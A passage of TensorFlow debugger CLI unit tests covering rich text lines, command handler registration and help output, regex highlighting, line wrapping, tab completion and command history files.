def testRichTextLinesConstructorIncomplete(self):
# Test RichTextLines constructor, with incomplete keyword arguments.
screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]})
self.assertEqual(2, len(screen_output.lines))
self.assertEqual(2, len(screen_output.font_attr_segs))
self.assertEqual(1, len(screen_output.font_attr_segs[0]))
self.assertEqual(1, len(screen_output.font_attr_segs[1]))
self.assertEqual({}, screen_output.annotations)
def testModifyRichTextLinesObject(self):
screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"])
self.assertEqual(2, len(screen_output.lines))
screen_output.lines.append("Sugar is sweet")
self.assertEqual(3, len(screen_output.lines))
def testMergeRichTextLines(self):
screen_output_1 = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]},
annotations={0: "longer wavelength",
1: "shorter wavelength"})
screen_output_2 = debugger_cli_common.RichTextLines(
["Lilies are white", "Sunflowers are yellow"],
font_attr_segs={0: [(0, 6, "white")],
1: [(0, 7, "yellow")]},
annotations={
"metadata": "foo",
0: "full spectrum",
1: "medium wavelength"
})
screen_output_1.extend(screen_output_2)
self.assertEqual(4, screen_output_1.num_lines())
self.assertEqual([
"Roses are red", "Violets are blue", "Lilies are white",
"Sunflowers are yellow"
], screen_output_1.lines)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
2: [(0, 6, "white")],
3: [(0, 7, "yellow")]
}, screen_output_1.font_attr_segs)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
2: [(0, 6, "white")],
3: [(0, 7, "yellow")]
}, screen_output_1.font_attr_segs)
self.assertEqual({
"metadata": "foo",
0: "longer wavelength",
1: "shorter wavelength",
2: "full spectrum",
3: "medium wavelength"
}, screen_output_1.annotations)
def testMergeRichTextLinesEmptyOther(self):
screen_output_1 = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]},
annotations={0: "longer wavelength",
1: "shorter wavelength"})
screen_output_2 = debugger_cli_common.RichTextLines([])
screen_output_1.extend(screen_output_2)
self.assertEqual(2, screen_output_1.num_lines())
self.assertEqual(["Roses are red", "Violets are blue"],
screen_output_1.lines)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
}, screen_output_1.font_attr_segs)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
}, screen_output_1.font_attr_segs)
self.assertEqual({
0: "longer wavelength",
1: "shorter wavelength",
}, screen_output_1.annotations)
def testMergeRichTextLinesEmptySelf(self):
screen_output_1 = debugger_cli_common.RichTextLines([])
screen_output_2 = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]},
annotations={0: "longer wavelength",
1: "shorter wavelength"})
screen_output_1.extend(screen_output_2)
self.assertEqual(2, screen_output_1.num_lines())
self.assertEqual(["Roses are red", "Violets are blue"],
screen_output_1.lines)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
}, screen_output_1.font_attr_segs)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
}, screen_output_1.font_attr_segs)
self.assertEqual({
0: "longer wavelength",
1: "shorter wavelength",
}, screen_output_1.annotations)
def testAppendALineWithAttributeSegmentsWorks(self):
screen_output_1 = debugger_cli_common.RichTextLines(
["Roses are red"],
font_attr_segs={0: [(0, 5, "red")]},
annotations={0: "longer wavelength"})
screen_output_1.append("Violets are blue", [(0, 7, "blue")])
self.assertEqual(["Roses are red", "Violets are blue"],
screen_output_1.lines)
self.assertEqual({
0: [(0, 5, "red")],
1: [(0, 7, "blue")],
}, screen_output_1.font_attr_segs)
def testPrependALineWithAttributeSegmentsWorks(self):
screen_output_1 = debugger_cli_common.RichTextLines(
["Roses are red"],
font_attr_segs={0: [(0, 5, "red")]},
annotations={0: "longer wavelength"})
screen_output_1.prepend("Violets are blue", font_attr_segs=[(0, 7, "blue")])
self.assertEqual(["Violets are blue", "Roses are red"],
screen_output_1.lines)
self.assertEqual({
0: [(0, 7, "blue")],
1: [(0, 5, "red")],
}, screen_output_1.font_attr_segs)
def testWriteToFileSucceeds(self):
screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]})
file_path = tempfile.mktemp()
screen_output.write_to_file(file_path)
with gfile.Open(file_path, "r") as f:
self.assertEqual("Roses are red\nViolets are blue\n", f.read())
# Clean up.
gfile.Remove(file_path)
def testAttemptToWriteToADirectoryFails(self):
screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]})
with self.assertRaises(Exception):
screen_output.write_to_file("/")
def testAttemptToWriteToFileInNonexistentDirectoryFails(self):
screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]})
file_path = os.path.join(tempfile.mkdtemp(), "foo", "bar.txt")
with self.assertRaises(Exception):
screen_output.write_to_file(file_path)
class CommandHandlerRegistryTest(test_util.TensorFlowTestCase):
def setUp(self):
self._intentional_error_msg = "Intentionally raised exception"
def _noop_handler(self, argv, screen_info=None):
# A handler that does nothing other than returning "Done."
return debugger_cli_common.RichTextLines(["Done."])
def _handler_raising_exception(self, argv, screen_info=None):
# A handler that intentionally raises an exception.
raise RuntimeError(self._intentional_error_msg)
def _handler_returning_wrong_type(self, argv, screen_info=None):
# A handler that returns a wrong type, instead of the correct type
# (RichTextLines).
return "Hello"
def _echo_screen_cols(self, argv, screen_info=None):
# A handler that uses screen_info.
return debugger_cli_common.RichTextLines(
["cols = %d" % screen_info["cols"]])
def _exiting_handler(self, argv, screen_info=None):
"""A handler that exits with an exit token."""
if argv:
exit_token = argv[0]
else:
exit_token = None
raise debugger_cli_common.CommandLineExit(exit_token=exit_token)
def testRegisterEmptyCommandPrefix(self):
registry = debugger_cli_common.CommandHandlerRegistry()
# Attempt to register an empty-string as a command prefix should trigger
# an exception.
with self.assertRaisesRegexp(ValueError, "Empty command prefix"):
registry.register_command_handler("", self._noop_handler, "")
def testRegisterAndInvokeHandler(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler("noop", self._noop_handler, "")
self.assertTrue(registry.is_registered("noop"))
self.assertFalse(registry.is_registered("beep"))
cmd_output = registry.dispatch_command("noop", [])
self.assertEqual(["Done."], cmd_output.lines)
# Attempt to invoke an unregistered command prefix should trigger an
# exception.
with self.assertRaisesRegexp(ValueError, "No handler is registered"):
registry.dispatch_command("beep", [])
# Empty command prefix should trigger an exception.
with self.assertRaisesRegexp(ValueError, "Prefix is empty"):
registry.dispatch_command("", [])
def testExitingHandler(self):
"""Test that exit exception is correctly raised."""
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler("exit", self._exiting_handler, "")
self.assertTrue(registry.is_registered("exit"))
exit_token = None
try:
registry.dispatch_command("exit", ["foo"])
except debugger_cli_common.CommandLineExit as e:
exit_token = e.exit_token
self.assertEqual("foo", exit_token)
def testInvokeHandlerWithScreenInfo(self):
registry = debugger_cli_common.CommandHandlerRegistry()
# Register and invoke a command handler that uses screen_info.
registry.register_command_handler("cols", self._echo_screen_cols, "")
cmd_output = registry.dispatch_command(
"cols", [], screen_info={"cols": 100})
self.assertEqual(["cols = 100"], cmd_output.lines)
def testRegisterAndInvokeHandlerWithAliases(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler(
"noop", self._noop_handler, "", prefix_aliases=["n", "NOOP"])
# is_registered() should work for full prefix and aliases.
self.assertTrue(registry.is_registered("noop"))
self.assertTrue(registry.is_registered("n"))
self.assertTrue(registry.is_registered("NOOP"))
cmd_output = registry.dispatch_command("n", [])
self.assertEqual(["Done."], cmd_output.lines)
cmd_output = registry.dispatch_command("NOOP", [])
self.assertEqual(["Done."], cmd_output.lines)
def testHandlerWithWrongReturnType(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler("wrong_return",
self._handler_returning_wrong_type, "")
# If the command handler fails to return a RichTextLines instance, an error
# should be triggered.
with self.assertRaisesRegexp(
ValueError,
"Return value from command handler.*is not None or a RichTextLines "
"instance"):
registry.dispatch_command("wrong_return", [])
def testRegisterDuplicateHandlers(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler("noop", self._noop_handler, "")
# Registering the same command prefix more than once should trigger an
# exception.
with self.assertRaisesRegexp(
ValueError, "A handler is already registered for command prefix"):
registry.register_command_handler("noop", self._noop_handler, "")
cmd_output = registry.dispatch_command("noop", [])
self.assertEqual(["Done."], cmd_output.lines)
def testRegisterDuplicateAliases(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler(
"noop", self._noop_handler, "", prefix_aliases=["n"])
# Clash with existing alias.
with self.assertRaisesRegexp(ValueError,
"clashes with existing prefixes or aliases"):
registry.register_command_handler(
"cols", self._echo_screen_cols, "", prefix_aliases=["n"])
# The name clash should have prevent the handler from being registered.
self.assertFalse(registry.is_registered("cols"))
# Aliases can also clash with command prefixes.
with self.assertRaisesRegexp(ValueError,
"clashes with existing prefixes or aliases"):
registry.register_command_handler(
"cols", self._echo_screen_cols, "", prefix_aliases=["noop"])
self.assertFalse(registry.is_registered("cols"))
def testDispatchHandlerRaisingException(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler("raise_exception",
self._handler_raising_exception, "")
# The registry should catch and wrap exceptions that occur during command
# handling.
cmd_output = registry.dispatch_command("raise_exception", [])
# The error output contains a stack trace.
# So the line count should be >= 2.
self.assertGreater(len(cmd_output.lines), 2)
self.assertTrue(cmd_output.lines[0].startswith(
"Error occurred during handling of command"))
self.assertTrue(cmd_output.lines[1].endswith(self._intentional_error_msg))
def testRegisterNonCallableHandler(self):
registry = debugger_cli_common.CommandHandlerRegistry()
# Attempt to register a non-callable handler should fail.
with self.assertRaisesRegexp(ValueError, "handler is not callable"):
registry.register_command_handler("non_callable", 1, "")
def testRegisterHandlerWithInvalidHelpInfoType(self):
registry = debugger_cli_common.CommandHandlerRegistry()
with self.assertRaisesRegexp(ValueError, "help_info is not a str"):
registry.register_command_handler("noop", self._noop_handler, ["foo"])
def testGetHelpFull(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler(
"noop",
self._noop_handler,
"No operation.\nI.e., do nothing.",
prefix_aliases=["n", "NOOP"])
registry.register_command_handler(
"cols",
self._echo_screen_cols,
"Show screen width in number of columns.",
prefix_aliases=["c"])
help_lines = registry.get_help().lines
# The help info should list commands in alphabetically sorted order,
# regardless of order in which the commands are registered.
self.assertEqual("cols", help_lines[0])
self.assertTrue(help_lines[1].endswith("Aliases: c"))
self.assertFalse(help_lines[2])
self.assertTrue(help_lines[3].endswith(
"Show screen width in number of columns."))
self.assertFalse(help_lines[4])
self.assertFalse(help_lines[5])
# The default help command should appear in the help output.
self.assertEqual("help", help_lines[6])
self.assertEqual("noop", help_lines[12])
self.assertTrue(help_lines[13].endswith("Aliases: n, NOOP"))
self.assertFalse(help_lines[14])
self.assertTrue(help_lines[15].endswith("No operation."))
self.assertTrue(help_lines[16].endswith("I.e., do nothing."))
def testGetHelpSingleCommand(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler(
"noop",
self._noop_handler,
"No operation.\nI.e., do nothing.",
prefix_aliases=["n", "NOOP"])
registry.register_command_handler(
"cols",
self._echo_screen_cols,
"Show screen width in number of columns.",
prefix_aliases=["c"])
# Get help info for one of the two commands, using full prefix.
help_lines = registry.get_help("cols").lines
self.assertTrue(help_lines[0].endswith("cols"))
self.assertTrue(help_lines[1].endswith("Aliases: c"))
self.assertFalse(help_lines[2])
self.assertTrue(help_lines[3].endswith(
"Show screen width in number of columns."))
# Get help info for one of the two commands, using alias.
help_lines = registry.get_help("c").lines
self.assertTrue(help_lines[0].endswith("cols"))
self.assertTrue(help_lines[1].endswith("Aliases: c"))
self.assertFalse(help_lines[2])
self.assertTrue(help_lines[3].endswith(
"Show screen width in number of columns."))
# Get help info for a nonexistent command.
help_lines = registry.get_help("foo").lines
self.assertEqual("Invalid command prefix: \"foo\"", help_lines[0])
def testHelpCommandWithoutIntro(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler(
"noop",
self._noop_handler,
"No operation.\nI.e., do nothing.",
prefix_aliases=["n", "NOOP"])
registry.register_command_handler(
"cols",
self._echo_screen_cols,
"Show screen width in number of columns.",
prefix_aliases=["c"])
# Get help for all commands.
output = registry.dispatch_command("help", [])
self.assertEqual(["cols", " Aliases: c", "",
" Show screen width in number of columns.", "", "",
"help", " Aliases: h", "", " Print this help message.",
"", "", "noop", " Aliases: n, NOOP", "",
" No operation.", " I.e., do nothing.", "", "",
"version", " Aliases: ver", "",
" Print the versions of TensorFlow and its key "
"dependencies.", "", ""],
output.lines)
# Get help for one specific command prefix.
output = registry.dispatch_command("help", ["noop"])
self.assertEqual(["noop", " Aliases: n, NOOP", "", " No operation.",
" I.e., do nothing."], output.lines)
# Get help for a nonexistent command prefix.
output = registry.dispatch_command("help", ["foo"])
self.assertEqual(["Invalid command prefix: \"foo\""], output.lines)
def testHelpCommandWithIntro(self):
registry = debugger_cli_common.CommandHandlerRegistry()
registry.register_command_handler(
"noop",
self._noop_handler,
"No operation.\nI.e., do nothing.",
prefix_aliases=["n", "NOOP"])
help_intro = debugger_cli_common.RichTextLines(
["Introductory comments.", ""])
registry.set_help_intro(help_intro)
output = registry.dispatch_command("help", [])
self.assertEqual(help_intro.lines + [
"help", " Aliases: h", "", " Print this help message.", "", "",
"noop", " Aliases: n, NOOP", "", " No operation.",
" I.e., do nothing.", "", "",
"version", " Aliases: ver", "",
" Print the versions of TensorFlow and its key dependencies.", "", ""
], output.lines)
class RegexFindTest(test_util.TensorFlowTestCase):
def setUp(self):
self._orig_screen_output = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"])
def testRegexFindWithoutExistingFontAttrSegs(self):
new_screen_output = debugger_cli_common.regex_find(self._orig_screen_output,
"are", "yellow")
self.assertEqual(2, len(new_screen_output.font_attr_segs))
self.assertEqual([(6, 9, "yellow")], new_screen_output.font_attr_segs[0])
self.assertEqual([(8, 11, "yellow")], new_screen_output.font_attr_segs[1])
# Check field in annotations carrying a list of matching line indices.
self.assertEqual([0, 1], new_screen_output.annotations[
debugger_cli_common.REGEX_MATCH_LINES_KEY])
def testRegexFindWithExistingFontAttrSegs(self):
# Add a font attribute segment first.
self._orig_screen_output.font_attr_segs[0] = [(9, 12, "red")]
self.assertEqual(1, len(self._orig_screen_output.font_attr_segs))
new_screen_output = debugger_cli_common.regex_find(self._orig_screen_output,
"are", "yellow")
self.assertEqual(2, len(new_screen_output.font_attr_segs))
self.assertEqual([(6, 9, "yellow"), (9, 12, "red")],
new_screen_output.font_attr_segs[0])
self.assertEqual([0, 1], new_screen_output.annotations[
debugger_cli_common.REGEX_MATCH_LINES_KEY])
def testRegexFindWithNoMatches(self):
new_screen_output = debugger_cli_common.regex_find(self._orig_screen_output,
"infrared", "yellow")
self.assertEqual({}, new_screen_output.font_attr_segs)
self.assertEqual([], new_screen_output.annotations[
debugger_cli_common.REGEX_MATCH_LINES_KEY])
def testInvalidRegex(self):
with self.assertRaisesRegexp(ValueError, "Invalid regular expression"):
debugger_cli_common.regex_find(self._orig_screen_output, "[", "yellow")
def testRegexFindOnPrependedLinesWorks(self):
rich_lines = debugger_cli_common.RichTextLines(["Violets are blue"])
rich_lines.prepend(["Roses are red"])
searched_rich_lines = debugger_cli_common.regex_find(
rich_lines, "red", "bold")
self.assertEqual(
{0: [(10, 13, "bold")]}, searched_rich_lines.font_attr_segs)
rich_lines = debugger_cli_common.RichTextLines(["Violets are blue"])
rich_lines.prepend(["A poem"], font_attr_segs=[(0, 1, "underline")])
searched_rich_lines = debugger_cli_common.regex_find(
rich_lines, "poem", "italic")
self.assertEqual(
{0: [(0, 1, "underline"), (2, 6, "italic")]},
searched_rich_lines.font_attr_segs)
class WrapScreenOutputTest(test_util.TensorFlowTestCase):
def setUp(self):
self._orig_screen_output = debugger_cli_common.RichTextLines(
["Folk song:", "Roses are red", "Violets are blue"],
font_attr_segs={1: [(0, 5, "red"), (6, 9, "gray"), (10, 12, "red"),
(12, 13, "crimson")],
2: [(0, 7, "blue"), (8, 11, "gray"), (12, 14, "blue"),
(14, 16, "indigo")]},
annotations={1: "longer wavelength",
2: "shorter wavelength"})
def testNoActualWrapping(self):
# Large column limit should lead to no actual wrapping.
out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
self._orig_screen_output, 100)
self.assertEqual(self._orig_screen_output.lines, out.lines)
self.assertEqual(self._orig_screen_output.font_attr_segs,
out.font_attr_segs)
self.assertEqual(self._orig_screen_output.annotations, out.annotations)
self.assertEqual(new_line_indices, [0, 1, 2])
def testWrappingWithAttrCutoff(self):
out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
self._orig_screen_output, 11)
# Add non-row-index field to out.
out.annotations["metadata"] = "foo"
# Check wrapped text.
self.assertEqual(5, len(out.lines))
self.assertEqual("Folk song:", out.lines[0])
self.assertEqual("Roses are r", out.lines[1])
self.assertEqual("ed", out.lines[2])
self.assertEqual("Violets are", out.lines[3])
self.assertEqual(" blue", out.lines[4])
# Check wrapped font_attr_segs.
self.assertFalse(0 in out.font_attr_segs)
self.assertEqual([(0, 5, "red"), (6, 9, "gray"), (10, 11, "red")],
out.font_attr_segs[1])
self.assertEqual([(0, 1, "red"), (1, 2, "crimson")], out.font_attr_segs[2])
self.assertEqual([(0, 7, "blue"), (8, 11, "gray")], out.font_attr_segs[3])
self.assertEqual([(1, 3, "blue"), (3, 5, "indigo")], out.font_attr_segs[4])
# Check annotations.
self.assertFalse(0 in out.annotations)
self.assertEqual("longer wavelength", out.annotations[1])
self.assertFalse(2 in out.annotations)
self.assertEqual("shorter wavelength", out.annotations[3])
self.assertFalse(4 in out.annotations)
# Chec that the non-row-index field is present in output.
self.assertEqual("foo", out.annotations["metadata"])
self.assertEqual(new_line_indices, [0, 1, 3])
def testWrappingWithMultipleAttrCutoff(self):
self._orig_screen_output = debugger_cli_common.RichTextLines(
["Folk song:", "Roses are red", "Violets are blue"],
font_attr_segs={1: [(0, 12, "red")],
2: [(1, 16, "blue")]},
annotations={1: "longer wavelength",
2: "shorter wavelength"})
out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
self._orig_screen_output, 5)
# Check wrapped text.
self.assertEqual(9, len(out.lines))
self.assertEqual("Folk ", out.lines[0])
self.assertEqual("song:", out.lines[1])
self.assertEqual("Roses", out.lines[2])
self.assertEqual(" are ", out.lines[3])
self.assertEqual("red", out.lines[4])
self.assertEqual("Viole", out.lines[5])
self.assertEqual("ts ar", out.lines[6])
self.assertEqual("e blu", out.lines[7])
self.assertEqual("e", out.lines[8])
# Check wrapped font_attr_segs.
self.assertFalse(0 in out.font_attr_segs)
self.assertFalse(1 in out.font_attr_segs)
self.assertEqual([(0, 5, "red")], out.font_attr_segs[2])
self.assertEqual([(0, 5, "red")], out.font_attr_segs[3])
self.assertEqual([(0, 2, "red")], out.font_attr_segs[4])
self.assertEqual([(1, 5, "blue")], out.font_attr_segs[5])
self.assertEqual([(0, 5, "blue")], out.font_attr_segs[6])
self.assertEqual([(0, 5, "blue")], out.font_attr_segs[7])
self.assertEqual([(0, 1, "blue")], out.font_attr_segs[8])
# Check annotations.
self.assertFalse(0 in out.annotations)
self.assertFalse(1 in out.annotations)
self.assertEqual("longer wavelength", out.annotations[2])
self.assertFalse(3 in out.annotations)
self.assertFalse(4 in out.annotations)
self.assertEqual("shorter wavelength", out.annotations[5])
self.assertFalse(6 in out.annotations)
self.assertFalse(7 in out.annotations)
self.assertFalse(8 in out.annotations)
self.assertEqual(new_line_indices, [0, 2, 5])
def testWrappingInvalidArguments(self):
with self.assertRaisesRegexp(ValueError,
"Invalid type of input screen_output"):
debugger_cli_common.wrap_rich_text_lines("foo", 12)
with self.assertRaisesRegexp(ValueError, "Invalid type of input cols"):
debugger_cli_common.wrap_rich_text_lines(
debugger_cli_common.RichTextLines(["foo", "bar"]), "12")
def testWrappingEmptyInput(self):
out, new_line_indices = debugger_cli_common.wrap_rich_text_lines(
debugger_cli_common.RichTextLines([]), 10)
self.assertEqual([], out.lines)
self.assertEqual([], new_line_indices)
class SliceRichTextLinesTest(test_util.TensorFlowTestCase):
def setUp(self):
self._original = debugger_cli_common.RichTextLines(
["Roses are red", "Violets are blue"],
font_attr_segs={0: [(0, 5, "red")],
1: [(0, 7, "blue")]},
annotations={
0: "longer wavelength",
1: "shorter wavelength",
"foo_metadata": "bar"
})
def testSliceBeginning(self):
sliced = self._original.slice(0, 1)
self.assertEqual(["Roses are red"], sliced.lines)
self.assertEqual({0: [(0, 5, "red")]}, sliced.font_attr_segs)
# Non-line-number metadata should be preserved.
self.assertEqual({
0: "longer wavelength",
"foo_metadata": "bar"
}, sliced.annotations)
self.assertEqual(1, sliced.num_lines())
def testSliceEnd(self):
sliced = self._original.slice(1, 2)
self.assertEqual(["Violets are blue"], sliced.lines)
# The line index should have changed from 1 to 0.
self.assertEqual({0: [(0, 7, "blue")]}, sliced.font_attr_segs)
self.assertEqual({
0: "shorter wavelength",
"foo_metadata": "bar"
}, sliced.annotations)
self.assertEqual(1, sliced.num_lines())
def testAttemptSliceWithNegativeIndex(self):
with self.assertRaisesRegexp(ValueError, "Encountered negative index"):
self._original.slice(0, -1)
class TabCompletionRegistryTest(test_util.TensorFlowTestCase):
def setUp(self):
self._tc_reg = debugger_cli_common.TabCompletionRegistry()
# Register the items in an unsorted order deliberately, to test the sorted
# output from get_completions().
self._tc_reg.register_tab_comp_context(
["print_tensor", "pt"],
["node_b:1", "node_b:2", "node_a:1", "node_a:2"])
self._tc_reg.register_tab_comp_context(["node_info"],
["node_c", "node_b", "node_a"])
def testTabCompletion(self):
# The returned completions should have sorted order.
self.assertEqual(
(["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("print_tensor", "node_"))
self.assertEqual((["node_a:1", "node_a:2", "node_b:1", "node_b:2"],
"node_"), self._tc_reg.get_completions("pt", ""))
self.assertEqual((["node_a:1", "node_a:2"], "node_a:"),
self._tc_reg.get_completions("print_tensor", "node_a"))
self.assertEqual((["node_a:1"], "node_a:1"),
self._tc_reg.get_completions("pt", "node_a:1"))
self.assertEqual(([], ""),
self._tc_reg.get_completions("print_tensor", "node_a:3"))
self.assertEqual((None, None), self._tc_reg.get_completions("foo", "node_"))
def testExtendCompletionItems(self):
self.assertEqual(
(["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("print_tensor", "node_"))
self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
self._tc_reg.get_completions("node_info", "node_"))
self._tc_reg.extend_comp_items("print_tensor", ["node_A:1", "node_A:2"])
self.assertEqual((["node_A:1", "node_A:2", "node_a:1", "node_a:2",
"node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("print_tensor", "node_"))
# Extending the completions for one of the context's context words should
# have taken effect on other context words of the same context as well.
self.assertEqual((["node_A:1", "node_A:2", "node_a:1", "node_a:2",
"node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("pt", "node_"))
self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
self._tc_reg.get_completions("node_info", "node_"))
def testExtendCompletionItemsNonexistentContext(self):
with self.assertRaisesRegexp(
KeyError, "Context word \"foo\" has not been registered"):
self._tc_reg.extend_comp_items("foo", ["node_A:1", "node_A:2"])
def testRemoveCompletionItems(self):
self.assertEqual(
(["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("print_tensor", "node_"))
self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
self._tc_reg.get_completions("node_info", "node_"))
self._tc_reg.remove_comp_items("pt", ["node_a:1", "node_a:2"])
self.assertEqual((["node_b:1", "node_b:2"], "node_b:"),
self._tc_reg.get_completions("print_tensor", "node_"))
self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
self._tc_reg.get_completions("node_info", "node_"))
def testRemoveCompletionItemsNonexistentContext(self):
with self.assertRaisesRegexp(
KeyError, "Context word \"foo\" has not been registered"):
self._tc_reg.remove_comp_items("foo", ["node_a:1", "node_a:2"])
def testDeregisterContext(self):
self.assertEqual(
(["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("print_tensor", "node_"))
self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
self._tc_reg.get_completions("node_info", "node_"))
self._tc_reg.deregister_context(["print_tensor"])
self.assertEqual((None, None),
self._tc_reg.get_completions("print_tensor", "node_"))
# The alternative context word should be unaffected.
self.assertEqual(
(["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("pt", "node_"))
def testDeregisterNonexistentContext(self):
self.assertEqual(
(["node_a:1", "node_a:2", "node_b:1", "node_b:2"], "node_"),
self._tc_reg.get_completions("print_tensor", "node_"))
self.assertEqual((["node_a", "node_b", "node_c"], "node_"),
self._tc_reg.get_completions("node_info", "node_"))
self._tc_reg.deregister_context(["print_tensor"])
with self.assertRaisesRegexp(
KeyError,
"Cannot deregister unregistered context word \"print_tensor\""):
self._tc_reg.deregister_context(["print_tensor"])
class CommandHistoryTest(test_util.TensorFlowTestCase):
def setUp(self):
self._history_file_path = tempfile.mktemp()
self._cmd_hist = debugger_cli_common.CommandHistory(
limit=3, history_file_path=self._history_file_path)
def tearDown(self):
if os.path.isfile(self._history_file_path):
os.remove(self._history_file_path)
def _restoreFileReadWritePermissions(self, file_path):
os.chmod(file_path,
(stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR |
stat.S_IWGRP | stat.S_IWOTH))
def testLookUpMostRecent(self):
self.assertEqual([], self._cmd_hist.most_recent_n(3))
self._cmd_hist.add_command("list_tensors")
self._cmd_hist.add_command("node_info node_a")
self.assertEqual(["node_info node_a"], self._cmd_hist.most_recent_n(1))
self.assertEqual(["list_tensors", "node_info node_a"],
self._cmd_hist.most_recent_n(2))
self.assertEqual(["list_tensors", "node_info node_a"],
self._cmd_hist.most_recent_n(3))
self._cmd_hist.add_command("node_info node_b")
self.assertEqual(["node_info node_b"], self._cmd_hist.most_recent_n(1))
self.assertEqual(["node_info node_a", "node_info node_b"],
self._cmd_hist.most_recent_n(2))
self.assertEqual(["list_tensors", "node_info node_a", "node_info node_b"],
self._cmd_hist.most_recent_n(3))
self.assertEqual(["list_tensors", "node_info node_a", "node_info node_b"],
self._cmd_hist.most_recent_n(4))
# Go over the limit.
self._cmd_hist.add_command("node_info node_a")
self.assertEqual(["node_info node_a"], self._cmd_hist.most_recent_n(1))
self.assertEqual(["node_info node_b", "node_info node_a"],
self._cmd_hist.most_recent_n(2))
self.assertEqual(
["node_info node_a", "node_info node_b", "node_info node_a"],
self._cmd_hist.most_recent_n(3))
self.assertEqual(
["node_info node_a", "node_info node_b", "node_info node_a"],
self._cmd_hist.most_recent_n(4))
def testLookUpPrefix(self):
self._cmd_hist.add_command("node_info node_b")
self._cmd_hist.add_command("list_tensors")
self._cmd_hist.add_command("node_info node_a")
self.assertEqual(["node_info node_b", "node_info node_a"],
self._cmd_hist.lookup_prefix("node_info", 10))
self.assertEqual(["node_info node_a"], self._cmd_hist.lookup_prefix(
"node_info", 1))
self.assertEqual([], self._cmd_hist.lookup_prefix("print_tensor", 10))
def testAddNonStrCommand(self):
with self.assertRaisesRegexp(
TypeError, "Attempt to enter non-str entry to command history"):
self._cmd_hist.add_command(["print_tensor node_a:0"])
def testRepeatingCommandsDoNotGetLoggedRepeatedly(self):
self._cmd_hist.add_command("help")
self._cmd_hist.add_command("help")
self.assertEqual(["help"], self._cmd_hist.most_recent_n(2))
def testCommandHistoryFileIsCreated(self):
self.assertFalse(os.path.isfile(self._history_file_path))
self._cmd_hist.add_command("help")
self.assertTrue(os.path.isfile(self._history_file_path))
with open(self._history_file_path, "rt") as f:
self.assertEqual(["help\n"], f.readlines())
def testLoadingCommandHistoryFileObeysLimit(self):
self._cmd_hist.add_command("help 1")
self._cmd_hist.add_command("help 2")
self._cmd_hist.add_command("help 3")
self._cmd_hist.add_command("help 4")
cmd_hist_2 = debugger_cli_common.CommandHistory(
limit=3, history_file_path=self._history_file_path)
self.assertEqual(["help 2", "help 3", "help 4"],
cmd_hist_2.most_recent_n(3))
with open(self._history_file_path, "rt") as f:
self.assertEqual(
["help 2\n", "help 3\n", "help 4\n"], f.readlines())
def testCommandHistoryHandlesReadingIOErrorGraciously(self):
with open(self._history_file_path, "wt") as f:
f.write("help\n")
# Change file to not readable by anyone.
os.chmod(self._history_file_path, 0)
# The creation of a CommandHistory object should not error out.
debugger_cli_common.CommandHistory(
limit=3, history_file_path=self._history_file_path)
self._restoreFileReadWritePermissions(self._history_file_path)
def testCommandHistoryHandlesWritingIOErrorGraciously(self):
with open(self._history_file_path, "wt") as f:
f.write("help\n")
# Change file to read-only.
os.chmod(self._history_file_path,
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Reading from the file should still work.
cmd_hist_2 = debugger_cli_common.CommandHistory(
limit=3, history_file_path=self._history_file_path)
self.assertEqual(["help"], cmd_hist_2.most_recent_n(1))
# Writing should no longer work, but it should fail silently and
# the within instance-command history should still work.
cmd_hist_2.add_command("foo")
